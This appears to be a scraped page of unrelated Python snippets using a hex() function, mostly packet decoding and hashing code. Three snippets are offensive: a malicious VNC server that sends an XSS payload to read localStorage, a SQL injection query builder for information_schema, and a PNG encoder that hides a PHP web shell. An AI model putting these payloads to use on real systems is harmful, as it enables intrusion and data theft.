Esempio n. 1
0
 def _send_packet(self, sock, packet, addr):
     """Packet を送信する"""
     packet.encode()
     buffer = packet.buffer()
     sock.sendto(buffer, addr)
     logger.packet.debug('{addr}<{buffer}', addr=addr, buffer=hex(buffer))
     logger.server.debug('N< {addr} {packet}', addr=addr, packet=packet)
Esempio n. 2
0
 def _recv_packet(self, sock):
     """Packet を受信する"""
     buffer, addr = sock.recvfrom(_RECV_BUFFER_SIZE)
     packet = protocol.net.packet(buffer)
     packet.decode()
     logger.packet.debug('{addr}>{buffer}', addr=addr, buffer=hex(buffer))
     logger.server.debug('N> {addr} {packet}', addr=addr, packet=packet)
     return packet, addr
Esempio n. 3
0
 def _decode_packet(self, packet, buffer, inout, kind):
     try:
         packet.decode()
         assert len(packet.buffer()) == 0
     except Exception as e:
         print(packet.__class__.__name__, '%r' % e, hex(packet.buffer()))
         print(kind, inout, buffer)
         raise DecodeException()
Esempio n. 4
0
 def __str__(self):
     attrs = (
         summary(k, getattr(self, k)) 
             for k in self.__slots__ 
                 if not k.startswith('_') and hasattr(self, k))
     buf = hex(self._buffer.bytes()) if self._buffer.is_reading() else ''
     return '{name}({attrs}) {buf}'.format(
         name=self.__class__.__name__, attrs=', '.join(attrs), buf=buf)
Esempio n. 5
0
 def decode(self):
     super().decode()
     self.unknown1 = self._buffer.next_byte()
     self.unknown2 = self._buffer.next_int()
     self.recipe_id = hex(self._buffer.next(16))
     self.material_items = list(self._buffer.next_item()
                                for _ in range(self._buffer.next_int()))
     self.product_items = list(self._buffer.next_item()
                               for _ in range(self._buffer.next_int()))
Esempio n. 6
0
 def _analyze_value(self, inout, value):
     if isinstance(value, set) or isinstance(value, list):
         return self._analyze_list(inout, value)
     if isinstance(value, bytes):
         return hex(value)
     if isinstance(value, EncapPacket):
         return self._analyze_encapsulated_packet(inout, value)
     if isinstance(value, Item) or isinstance(value, MetaData):
         return str(value)
     return value
Esempio n. 7
0
 def check_pix(self, pix):
     pix = self.query.get("Pixels", pix.id.val)
     self.assert_(pix.sha1.val != "")
     rps = self.client.sf.createRawPixelsStore()
     try:
         rps.setPixelsId(pix.id.val, True)
         sha1 = hex(rps.calculateMessageDigest())
         self.assertEquals(sha1, pix.sha1.val)
     finally:
         rps.close()
Esempio n. 8
0
 def check_pix(self, pix):
     pix = self.query.get("Pixels", pix.id.val)
     assert pix.sha1.val != ""
     rps = self.client.sf.createRawPixelsStore()
     try:
         rps.setPixelsId(pix.id.val, True)
         sha1 = hex(rps.calculateMessageDigest())
         assert sha1 == pix.sha1.val
     finally:
         rps.close()
Esempio n. 9
0
def get_sha256_salt_and_hash(password):
    from Crypto.Random import get_random_bytes
    from binascii import hexlify as hex, unhexlify as unhex
    from Crypto.Hash import SHA256

    new_salt = hex(get_random_bytes(8)).decode("utf8")

    h = SHA256.new()
    h.update('soma)password'.encode('utf8'))

    new_hash = new_salt + h.hexdigest()
    return (new_salt, new_hash)
Esempio n. 10
0
 def _analyze_batch(self, inout, payload):
     data = {}
     buffer = hex(payload)
     packet = protocol_serv.packet(bytes.fromhex(buffer))
     if isinstance(packet, StreamRaw):
         self._update_meta(data, inout, packet, buffer)
         data['payload'] = buffer
         return data
     self._decode_packet(packet, buffer, inout, 'ServicePacket')
     self._update_meta(data, inout, packet, buffer)
     for name, value in self._analyze_attrs(inout, packet):
         data[name] = self._analyze_value(inout, value)
     return data
Esempio n. 11
0
 def _analyze_encapsulated_packet(self, inout, packet):
     data = {}
     if getattr(packet, 'reliability') != None:
         data['_reliability'] = getattr(packet, 'reliability')
     if getattr(packet, 'message') != None:
         data['_message'] = getattr(packet, 'message')
     if getattr(packet, 'order') != None:
         data['_order'] = getattr(packet, 'order')
     if getattr(packet, 'split') != None:
         data['_split'] = getattr(packet, 'split')
     buffer = hex(packet.buffer)
     self._update_meta(data, inout, packet, buffer)
     if packet.split:
         packet = self._split_packets[inout].concat(packet)
         if packet == None:
             return data
     buffer = hex(packet.buffer)
     packet = protocol.app.packet(bytes.fromhex(buffer))
     if not isinstance(packet, StreamRaw):
         self._decode_packet(packet, buffer, inout, 'NetworkPacket')
         self._update_meta(data, inout, packet, buffer)
         for name, value in self._analyze_attrs(inout, packet):
             data[name] = self._analyze_value(inout, value)
         return data
     packet = protocol_serv.packet(bytes.fromhex(buffer))
     if isinstance(packet, StreamRaw):
         self._update_meta(data, inout, packet, buffer)
         data['payload'] = buffer
         return data
     self._decode_packet(packet, buffer, inout, 'ServicePacket')
     self._update_meta(data, inout, packet, buffer)
     if not isinstance(packet, Batch):
         for name, value in self._analyze_attrs(inout, packet):
             data[name] = self._analyze_value(inout, value)
         return data
     data['packets'] = list(
         self._analyze_batch(inout, payload) for payload in packet.payloads)
     return data
Esempio n. 12
0
 def _next_recipe(self):
     kind = self._buffer.next_int()
     if kind == 0:
         unknown = self._buffer.next_int()
         count = self._buffer.next_int()
         material_items = list(self._buffer.next_item()
                               for _ in range(count))
         count = self._buffer.next_int()
         product_items = list(self._buffer.next_item()
                              for _ in range(count))
         recipe_id = hex(self._buffer.next(16))
         return (kind, unknown, material_items, product_items, recipe_id)
     if kind == 1:
         unknown = self._buffer.next_int()
         rows = self._buffer.next_int()
         cols = self._buffer.next_int()
         material_items = list(self._buffer.next_item()
                               for _ in range(rows * cols))
         count = self._buffer.next_int()
         product_items = list(self._buffer.next_item()
                              for _ in range(count))
         recipe_id = hex(self._buffer.next(16))
         return (kind, unknown, rows, cols, material_items, product_items,
                 recipe_id)
     if kind == 2:
         unknown1 = self._buffer.next_int()
         unknown2 = self._buffer.next_int()
         item = self._buffer.next_item()
         return (kind, unknown1, unknown2, item)
     if kind == 3:
         unknown1 = self._buffer.next_int()
         unknown2 = hex(self._buffer.next(11))
         return (kind, unknown1, unknown2)
     if kind == 5:
         unknown1 = hex(self._buffer.next(20))
         return (kind, unknown1)
Esempio n. 13
0
    def _send_buffer(self, send_func):
        while True:
            buffer = yield
            if buffer[0] == '8':

                def triad():
                    n = self._num_of_data_packet
                    for _ in range(3):
                        yield n & 0xFF
                        n >>= 8

                seq_num = hex(bytes(b for b in triad()))
                buffer = buffer[0:2] + seq_num + buffer[8:]
                self._num_of_data_packet += 1
            send_func(buffer)
            yield None
Esempio n. 14
0
        msg.errno, msg.strerror))
    sys.exit()
s.listen(10)
print('Server started')

while 1:
    conn, addr = s.accept()
    print('Connected with ' + addr[0] + ':' + str(addr[1]))

    print('Sending version info')
    comunicate(conn, '524642203030332e3030380a')

    print('Handshake')
    comunicate(conn, '0101')  # no password

    print('Starting the vnc dance')
    comunicate(conn, '00000000')

    print('Sending server-name with XSS injection')
    xss = b'<img onerror=alert(JSON.stringify(localStorage)) src=# />'
    comunicate(
        conn, '040003002018000100ff00ff00ff100800000000000000{:02x}{}'.format(
            len(xss),
            hex(xss).decode()))

    sleep(30)
    print('Quitting')
    conn.close()

s.close()
Esempio n. 15
0
 def __str__(self):
     return '{name}({buf})'.format(
         name=self.__class__.__name__,
         buf=hex(self._buffer.bytes()))
Esempio n. 16
0
 def decode(self):
     super().decode()
     self.eid = self._buffer.next_long()
     self.unknown = hex(self._buffer.next())
Esempio n. 17
0
def select_all_columns(table_name):
    table_name = '0x' + str(hex(table_name))
    payload = "select group_concat(column_name) from information_schema.columns where table_name=%s" % (
        table_name)
    return payload
Esempio n. 18
0
        g = payload[i + 1]
        b = payload[i + 2]
        im.putpixel((c, 0), (r, g, b))
        i += 3
        c += 1
    im.save(output_image)


def verify(filename, clear_payload):
    """
	# I would like to verify if the PNG is valid and not corrupt but Pillow .verify() is not yet implemented
	im = Image.open(filename)
	im.verify()
	im.close()
	"""
    content = open(filename, "rb").read()
    assert (clear_payload in content)


if __name__ == "__main__":
    payload = b"a39f67546f2c24152b116712546f112e29152b2167226b6f5f5310"
    filename = "test.png"
    filterproof = bypass_filters(payload)
    # the following assert assure that filter1 and filter3 perform the correct transformation to the payload
    assert (
        hex(bytes(filterproof)) ==
        b"a39f67f70e931b23be2c8ad080f9e1ae22f6d9435dfbaecc5a01dca39f67a5be5f76745a4ca13f7abf306b882d60657d529dad88a166"
    )
    save_image(filterproof, filename)
    verify(filename, b"<?=$_GET[0]($_POST[1]);?>")
Esempio n. 19
0
 def handle_recv_packet(sock):
     return hex(sock.recv(4096))
Esempio n. 20
0
def password_hash(pw):
    val = "".encode('utf-8')
    pw = pw.encode('utf-8')
    for _ in range(50000):
        val = sha256hash(val + pw).digest()
    return hex(val).decode('utf-8')
Esempio n. 21
0
def doit(v):
    name = v['name']
    aead = globals()[v['cipher']]
    init_dh = globals()['Curve'+v['dh']]
    resp_dh = globals()['Curve'+v['dh']]
    hash = globals()[v['hash']]
    pattern = globals()['Noise_'+v['pattern']]
    one_way = False
    if v['pattern'] in [ 'N', 'X', 'K' ]:
        one_way = True

    prefix = 'Noise'
    if v.get('init_psk', None) is not None:
        prefix += 'PSK'

    init_ssk = unhex(v.get('init_ssk', ''))
    resp_ssk = unhex(v.get('resp_ssk', ''))

    if init_ssk != '':
        prefix += '_SSK'
    assert name == '_'.join([prefix, pattern.name, init_dh.name, aead.name, hash.name])

    init_prologue = unhex(v.get('init_prologue'))
    resp_prologue = unhex(v.get('resp_prologue'))
    init_ephemeral = unhex(v.get('init_ephemeral'))
    resp_ephemeral = unhex(v.get('resp_ephemeral'))

    init_psk = unhex(v.get('init_psk', None))
    resp_psk = unhex(v.get('resp_psk', None))

    init_static = unhex(v.get('init_static', None))
    resp_static = unhex(v.get('resp_static', None))
    if init_static is not None:
        dh = init_dh(lambda x: init_static)
        init_static = dh.generate_keypair()
    if resp_static is not None:
        dh = resp_dh(lambda x: resp_static)
        dh.priv = resp_static
        resp_static = dh.generate_keypair()
    init_semiephemeral = unhex(v.get('init_semiephemeral', None))
    resp_semiephemeral = unhex(v.get('resp_semiephemeral', None))
    init_remote_static = unhex(v.get('init_remote_static', None))
    resp_remote_static = unhex(v.get('resp_remote_static', None))
    init_remote_semiephemeral = unhex(v.get('init_remote_semiephemeral', None))
    resp_remote_semiephemeral = unhex(v.get('resp_remote_semiephemeral', None))

    init = NoiseHandshake(aead, hash, init_dh, lambda x: init_ephemeral)
    resp = NoiseHandshake(aead, hash, resp_dh, lambda y: resp_ephemeral)

    init.Initialize(pattern, True, init_prologue, init_static, init_semiephemeral, init_remote_static, init_remote_semiephemeral, init_psk)
    resp.Initialize(pattern, False, resp_prologue, resp_static, resp_semiephemeral, resp_remote_static, resp_remote_semiephemeral, resp_psk)

    send, recv = init, resp

    messages = v['messages']
    while len(messages) > 0:
        m = messages.pop(0)
        ct = unhex(m['ciphertext'])
        print "ct:\t{0}".format(hex(ct))
        payload = unhex(m.get('payload', ''))
        print "p:\t{0}".format(hex(payload))
        iout, ic1, ic2 = send.WriteMessage(payload)
        assert ct == iout
        print "iout:\t{0}".format(hex(iout))
        rout, rc1, rc2 = recv.ReadMessage(iout)
        print "rout:\t{0}".format(hex(rout))
        send, recv = recv, send
        if ic1 is not None and ic2 is not None and rc1 is not None and rc2 is not None:
            break

    # redo split with SSK
    ic1, ic2 = send.ss.Split(init_ssk)
    rc1, rc2 = send.ss.Split(resp_ssk)

    if resp.initiator and not one_way:
        ic2, ic1, rc2, rc1 = rc1, rc2, ic1, ic2
    for m in messages: 
        ct = unhex(m['ciphertext'])
        print "ct:\t{0}".format(hex(ct))
        payload = unhex(m.get('payload', ''))
        print "p:\t{0}".format(hex(payload))
        iout = ic1.EncryptWithAd('', payload)
        print "iout:\t{0}".format(hex(iout))
        rout = rc1.DecryptWithAd('', iout)
        assert ct == iout
        if not one_way:
            ic2, ic1, rc2, rc1 = rc1, rc2, ic1, ic2
Esempio n. 22
0
 def _next(self):
     unknown1 = self._buffer.next_int()
     unknown2 = hex(self._buffer.next(8))
     unknown3 = self._buffer.next_str()
     return unknown1, unknown2, unknown3
Esempio n. 23
0
 def _next_player(self):
     return dict(public_id=hex(self._buffer.next(16)),
                 eid=self._buffer.next_long(),
                 user_name=self._buffer.next_str(),
                 skin_name=self._buffer.next_str(),
                 skin=self._buffer.next_bytes())